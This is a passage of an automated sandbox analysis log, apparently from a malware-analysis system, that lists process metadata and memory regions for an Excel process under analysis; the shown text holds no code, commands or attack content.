# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 28.09.2021 05:23:07.828 Process: id = "1" image_name = "excel.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\excel.exe" page_root = "0x690ca000" os_pid = "0xd44" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\EXCEL.EXE\"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 259 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 260 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 261 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 262 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 263 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 264 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 265 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 266 start_va = 0x1f0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 267 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 268 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 269 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 270 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 271 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 272 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 273 start_va = 0x450000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 274 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 275 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 276 start_va = 0x480000 end_va = 0x481fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 277 start_va = 0x490000 end_va = 0x491fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 278 start_va = 0x4a0000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 279 start_va = 0x4b0000 end_va = 0x4b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 280 start_va = 0x4c0000 end_va = 0x4c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 281 start_va = 0x4d0000 end_va = 0x4d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 282 start_va = 0x4e0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 283 start_va = 0x5e0000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 284 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 285 start_va = 0x6b0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 286 start_va = 0x6f0000 end_va = 0x71dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 287 start_va = 0x720000 end_va = 0x720fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 288 start_va = 0x730000 end_va = 0x730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 289 start_va = 0x740000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 290 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 291 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 292 start_va = 0x770000 end_va = 0x773fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 293 start_va = 0x780000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 294 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 295 start_va = 0x930000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 296 start_va = 0xac0000 end_va = 0xdf6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 297 start_va = 0xe00000 end_va = 0xfb8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 298 start_va = 0xfc0000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fc0000" filename = "" Region: id = 299 start_va = 0x1000000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 300 start_va = 0x1040000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 301 start_va = 0x1080000 end_va = 0x1083fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 302 start_va = 0x1090000 end_va = 0x1091fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001090000" filename = "" Region: id = 303 start_va = 0x10a0000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 304 start_va = 0x10b0000 end_va = 0x13b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uires.dll") Region: id = 305 start_va = 0x13c0000 end_va = 0x13c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 306 start_va = 0x13d0000 end_va = 0x13defff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 307 start_va = 0x13e0000 end_va = 0x2db8fff monitored = 0 entry_point = 0x13e1000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\excel.exe") Region: id = 308 start_va = 0x2dc0000 end_va = 0x41bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002dc0000" filename = "" Region: id = 309 start_va = 0x41c0000 end_va = 0x4ae0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lres.dll") Region: id = 310 start_va = 0x4af0000 end_va = 0x992efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msores.dll") Region: id = 311 start_va = 0x9930000 end_va = 0xa962fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "xlintl32.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\xlintl32.dll") Region: id = 312 start_va = 0xa970000 end_va = 0xaa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a970000" filename = "" Region: id = 313 start_va = 0xaa70000 end_va = 0xab6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aa70000" filename = "" Region: id = 314 start_va = 0xab70000 end_va = 0xac6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ab70000" filename = "" Region: id = 315 start_va = 0xac70000 end_va = 0xad6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ac70000" filename = "" Region: id = 316 start_va = 0xad70000 end_va = 0xae6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad70000" filename = "" Region: id = 317 start_va = 0xae70000 end_va = 0xaf2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ae70000" filename = "" Region: id = 318 start_va = 0xaf30000 end_va = 0xaf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af30000" filename = "" Region: id = 319 start_va = 0xaf70000 end_va = 0xb06ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af70000" filename = "" Region: id = 320 start_va = 0xb070000 end_va = 0xb561fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b070000" filename = "" Region: id = 321 start_va = 0xb570000 end_va = 0xb5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b570000" filename = "" Region: id = 322 start_va = 0xb5b0000 end_va = 0xb6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b5b0000" filename = "" Region: id = 323 start_va = 0xb6b0000 end_va = 0xb824fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 324 start_va = 0xb830000 end_va = 0xb833fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b830000" filename = "" Region: id = 325 start_va = 0xb840000 end_va = 0xb840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b840000" filename = "" Region: id = 326 start_va = 0xb850000 end_va = 0xb85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b850000" filename = "" Region: id = 327 start_va = 0xb860000 end_va = 0xb89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b860000" filename = "" Region: id = 328 start_va = 0xb8a0000 end_va = 0xb99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b8a0000" filename = "" Region: id = 329 start_va = 0xb9a0000 end_va = 0xba75fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b9a0000" filename = "" Region: id = 330 start_va = 0xba80000 end_va = 0xba9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ba80000" filename = "" Region: id = 331 start_va = 0xbaa0000 end_va = 0xbabefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000baa0000" filename = "" Region: id = 332 start_va = 0xbac0000 end_va = 0xbacbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bac0000" filename = "" Region: id = 333 start_va = 0xbad0000 end_va = 0xbadbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bad0000" filename = "" Region: id = 334 start_va = 0xbae0000 end_va = 0xbae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bae0000" filename = "" Region: id = 335 start_va = 0xbaf0000 end_va = 0xbaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000baf0000" filename = "" Region: id = 336 start_va = 0xbb00000 end_va = 0xbb00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bb00000" filename = "" Region: id = 337 start_va = 0xbb10000 end_va = 0xbb10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bb10000" filename = "" Region: id = 338 start_va = 0xbb20000 end_va = 0xbb20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bb20000" filename = "" Region: id = 339 start_va = 0xbb30000 end_va = 0xbb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bb30000" filename = "" Region: id = 340 start_va = 0xbb40000 end_va = 0xc33ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bb40000" filename = "" Region: id = 341 start_va = 0xc340000 end_va = 0xc53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c340000" filename = "" Region: id = 342 start_va = 0xc540000 end_va = 0xc57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c540000" filename = "" Region: id = 343 start_va = 0xc580000 end_va = 0xc67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c580000" filename = "" Region: id = 344 start_va = 0xc680000 end_va = 0xc6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c680000" filename = "" Region: id = 345 start_va = 0xc700000 end_va = 0xc701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c700000" filename = "" Region: id = 346 start_va = 0xc710000 end_va = 0xc710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c710000" filename = "" Region: id = 347 start_va = 0xc720000 end_va = 0xc724fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 348 start_va = 0xc730000 end_va = 0xc730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c730000" filename = "" Region: id = 349 start_va = 0xc740000 end_va = 0xc740fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c740000" filename = "" Region: id = 350 start_va = 0xc750000 end_va = 0xc750fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c750000" filename = "" Region: id = 351 start_va = 0xc760000 end_va = 0xc83bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeuib.ttf" filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf") Region: id = 352 start_va = 0xc840000 end_va = 0xc851fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normidna.nls" filename = "\\Windows\\System32\\normidna.nls" (normalized: "c:\\windows\\system32\\normidna.nls") Region: id = 353 start_va = 0xc860000 end_va = 0xc863fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 354 start_va = 0xc870000 end_va = 0xc876fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c870000" filename = "" Region: id = 355 start_va = 0xc880000 end_va = 0xc8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c880000" filename = "" Region: id = 356 start_va = 0xc8c0000 end_va = 0xc8c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c8c0000" filename = "" Region: id = 357 start_va = 0xc8d0000 end_va = 0xc8d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c8d0000" filename = "" Region: id = 358 start_va = 0xc8e0000 end_va = 0xc8e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c8e0000" filename = "" Region: id = 359 start_va = 0xc8f0000 end_va = 0xc8fcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comdlg32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\comdlg32.dll.mui") Region: id = 360 start_va = 0xc900000 end_va = 0xc900fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c900000" filename = "" Region: id = 361 start_va = 0xc910000 end_va = 0xc911fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c910000" filename = "" Region: id = 362 start_va = 0xc920000 end_va = 0xc920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c920000" filename = "" Region: id = 363 start_va = 0xc930000 end_va = 0xc930fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c930000" filename = "" Region: id = 364 start_va = 0xc940000 end_va = 0xc94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c940000" filename = "" Region: id = 365 start_va = 0xc950000 end_va = 0xc950fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c950000" filename = "" Region: id = 366 start_va = 0xc960000 end_va = 0xc961fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c960000" filename = "" Region: id = 367 start_va = 0xc970000 end_va = 0xc976fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\explorerframe.dll.mui") Region: id = 368 start_va = 0xc980000 end_va = 0xc983fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 369 start_va = 0xc990000 end_va = 0xc9d4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 370 start_va = 0xc9e0000 end_va = 0xc9e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 371 start_va = 0xc9f0000 end_va = 0xc9f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000c9f0000" filename = "" Region: id = 372 start_va = 0xca00000 end_va = 0xca3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ca00000" filename = "" Region: id = 373 start_va = 0xca40000 end_va = 0xcb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ca40000" filename = "" Region: id = 374 start_va = 0xcb40000 end_va = 0xcb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb40000" filename = "" Region: id = 375 start_va = 0xcb80000 end_va = 0xcc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb80000" filename = "" Region: id = 376 start_va = 0xcc80000 end_va = 0xccbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc80000" filename = "" Region: id = 377 start_va = 0xccc0000 end_va = 0xcdbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ccc0000" filename = "" Region: id = 378 start_va = 0xcdc0000 end_va = 0xcdd2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 379 start_va = 0xcde0000 end_va = 0xce6dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 380 start_va = 0xce70000 end_va = 0xce71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce70000" filename = "" Region: id = 381 start_va = 0xce80000 end_va = 0xce83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce80000" filename = "" Region: id = 382 start_va = 0xce90000 end_va = 0xce90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce90000" filename = "" Region: id = 383 start_va = 0xcea0000 end_va = 0xcea3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cea0000" filename = "" Region: id = 384 start_va = 0xceb0000 end_va = 0xceb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ceb0000" filename = "" Region: id = 385 start_va = 0xcec0000 end_va = 0xcee3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cec0000" filename = "" Region: id = 386 start_va = 0xcef0000 end_va = 0xcef0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cef0000" filename = "" Region: id = 387 start_va = 0xcf00000 end_va = 0xcf01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf00000" filename = "" Region: id = 388 start_va = 0xcf10000 end_va = 0xcf58fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 389 start_va = 0xcf60000 end_va = 0xd05ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf60000" filename = "" Region: id = 390 start_va = 0xd060000 end_va = 0xe05ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 391 start_va = 0xe060000 end_va = 0xe85ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 392 start_va = 0xe860000 end_va = 0xe93efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 393 start_va = 0xe940000 end_va = 0xe940fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e940000" filename = "" Region: id = 394 start_va = 0xe950000 end_va = 0xe991fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 395 start_va = 0xe9a0000 end_va = 0xed9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e9a0000" filename = "" Region: id = 396 start_va = 0xeda0000 end_va = 0xf19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eda0000" filename = "" Region: id = 397 start_va = 0xf1a0000 end_va = 0xf1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f1a0000" filename = "" Region: id = 398 start_va = 0xf1e0000 end_va = 0xf2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f1e0000" filename = "" Region: id = 399 start_va = 0xf2e0000 end_va = 0xf3b3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeuil.ttf" filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf") Region: id = 400 start_va = 0xf3c0000 end_va = 0xf4a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 401 start_va = 0xf4b0000 end_va = 0xf585fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f4b0000" filename = "" Region: id = 402 start_va = 0xf590000 end_va = 0xf5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f590000" filename = "" Region: id = 403 start_va = 0xf5d0000 end_va = 0xf5d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f5d0000" filename = "" Region: id = 404 start_va = 0xf5e0000 end_va = 0xf5e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f5e0000" filename = "" Region: id = 405 start_va = 0xf5f0000 end_va = 0xf5fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f5f0000" filename = "" Region: id = 406 start_va = 0xf600000 end_va = 0xf60ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f600000" filename = "" Region: id = 407 start_va = 0xf610000 end_va = 0xf61ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f610000" filename = "" Region: id = 408 start_va = 0xf620000 end_va = 0xfa26fff monitored = 1 